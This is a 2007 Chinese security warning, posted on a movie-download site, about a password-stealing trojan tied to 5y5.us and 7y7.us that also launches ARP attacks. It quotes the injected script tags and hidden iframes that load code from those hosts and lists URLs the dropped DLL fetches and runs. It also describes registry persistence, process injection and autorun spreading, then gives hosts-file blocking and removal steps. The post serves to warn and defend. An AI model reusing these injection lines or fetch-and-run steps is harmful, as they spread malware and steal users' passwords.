迅雷资源网---7*24小时为您服务!
QQ影视网  

本站推荐欧美电影

本站推荐港台电视剧

国内电影下载排行

国内电视剧下载排行

5Y5.us 病毒,大家注意了

    发布时间:2007-7-22 11:11:11             

    此病毒应该就是在这几天前发做,是用于盗取密码为主,中毒的主机还会自动进行ARP攻击使网络变的非常卡或根本连接不上网络

    此病毒。还会在局网传播。也就是。你家有10台电脑同用一条ADSL。其中一台中了。就会全部都中了。

    在微软还没发布补叮时。建议少去不知名网站。小心中毒。。。


    病毒中毒现象.打开任何网站时.会在你所打开的网站加载一个地址.那地址就是  HTTP://5Y5.US

    本机中时.不开网页不会没事.一但你开了.就加载了.特别要注意的事.打开网页左下角的的状态栏.
    注意这个病毒至今暂时无法被今天的卡巴斯基杀掉、瑞星、360安全卫士之类查杀,也无专杀工具。

    用路由上网的朋友可以把5y5.us和7y7.us都加进“域名过滤”当中。

    广大网友一定要小心中招。。。。。。。。。。。。。。。。。。。。。


    关于7y7.us与ws91.com 进行的APR攻击:
    <script src="http://www.7y7.us/oK/Vernum.js"></script>
    <script src="http://www.7y7.us/oK/New.js"></script>

    C:\WINDOWS\~tmp4704.exe
    hTTp://7y7.us/oK/svchost.exe
    木马生成到这
    C:\program files\internet explorer\plugins\
    BinNice.dll
    BinNice.bak

    1、复制自身到如下路径:
    C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.bak
    释放病毒DLL文件到如下路径:
    C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.dll

    2、修改注册表,添加如下表项,是病毒每次系统启动时加载自身:

    HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\(Default)
    HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\InProcServer32
    (Default)="C:\ProgramFiles\InternetExplorer\PLUGINS\BinNice.dll"
    HKCR\CLSID\{06E6B6B6-BE3C-6E23-6C8E-B833E2CE63B8}\InProcServer32
    "ThreadingModel"="Apartment"

    3、安装全局钩子,将病毒dll文件注入系统中存在的进程。

    4、当发现注入的进程为explorer.exe或VerCLSID.exe时,连接网络到如下网址下载病毒到本地并运行:

    内容来自反病毒


    h**p://7y7.us/s**n/csrss.exe
    h**p://7y7.us/s**n/svchost32.exe
    h**p://7y7.us/s**n/smss.exe
    h**p://7y7.us/s**n/services.exe
    h**p://7y7.us/s**n/svchost.exe
    h**p://7y7.us/s**n/conime.exe
    h**p://7y7.us/s**n/ctfmon.exe
    h**p://7y7.us/s**n/mmc.exe
    h**p://7y7.us/s**n/iexplore.exe
    h**p://7y7.us/s**n/srogm.exe

    5、向可移动磁盘中复制如下病毒文件,传播自身:
    Ghost.pif
    autorun.inf


    关于5y5.us:
    在打开所有网页,都会自动加载以下代码:
    <iframe src=http://5y5.us/ width=100 height=0 frameborder=0></iframe>
    <iframe src=http://5y5.us/2/002.htm width=0 height=0></iframe> <html>
    或  等网址...

    处理:
    (1)立刻屏蔽那些域名的访问:
    立刻关闭IE,然后用记本事打开:
    C:\WINDOWS\system32\drivers\etc
    下的,HOST文件...

    在127.0.0.1       localhost下面,,换行,加上下面的地址:

    127.0.0.1       5y5.us
    127.0.0.1       www.5y5.us
    127.0.0.1       www.7y7.us
    127.0.0.1       7y7.us
    127.0.0.1       ws91.com
    127.0.0.1       www.ws91.com

    保存就OK了,,访问那些网址,都不会转到127.0.0.1(本机IP)这个IP了..

    (2)7y7.us专杀:
    下载一个360安全卫士,,地址:http://www.360safe.com/
    他们网站有专杀工具...

    (3)防范:
    使用火狐浏览器.

    (4)中毒的主机要想用ARP攻击,就得不断变化自己的MAC地址来截取和发送数据包。
    看交换机上哪能个电脑的流量最大,灯狂闪,找到了,就是它


    资源点击:[ ]次     官方强烈推荐使用web迅雷进行高速下载!      欢迎加入本站QQ(拒绝表示人满了)
    QQ:34269878


                     
    温心提示本站提供电影都为迅雷下载地址,请使用迅雷进行下载! 播放说明:一般您下载的电影格式都为rmvb或者rm格式用普通播放器就可进行播放,但如果您下载的影盘是.FLV格式的,请使用暴风影音 进行播放

    ●本栏目最新资源列表:
  • · 工行“网瘫”病在网络还是人...
  • · 盖茨北大演讲遭抗议
  • · 5Y5.us 病毒,大家注意了
  • · 雅虎购Rivals 超越ESPN登上体...
  • · 揭密网络色情行业内幕
  • · 互联星空涉黄 电信责任最大
  • · AMD下半年推7系芯片组 取消支...
  • · 戴尔销售战略转型 拟在亚洲建...
  • · Google Adsense改变不了网站...
  • · 谷歌个性化主页遭遇技术问题...
  • ●本栏目最热门资源列表:
  • · Google Adsense改变不了网站...
  • · 广捷居被传今日受到ARP攻击
  • · 揭密网络色情行业内幕
  • · 公安部关闭色情网站1500个 打...
  • · 博士创办红娘网站吸引人 高校...
  • · 信产部:防色情内容 今年ISP...
  • · 百度秘密从金融业挖人 深入搜...
  • · 公安部:下月起重罚涉黄网站...
  • · 雅虎购Rivals 超越ESPN登上体...
  • · AMD下半年推7系芯片组 取消支...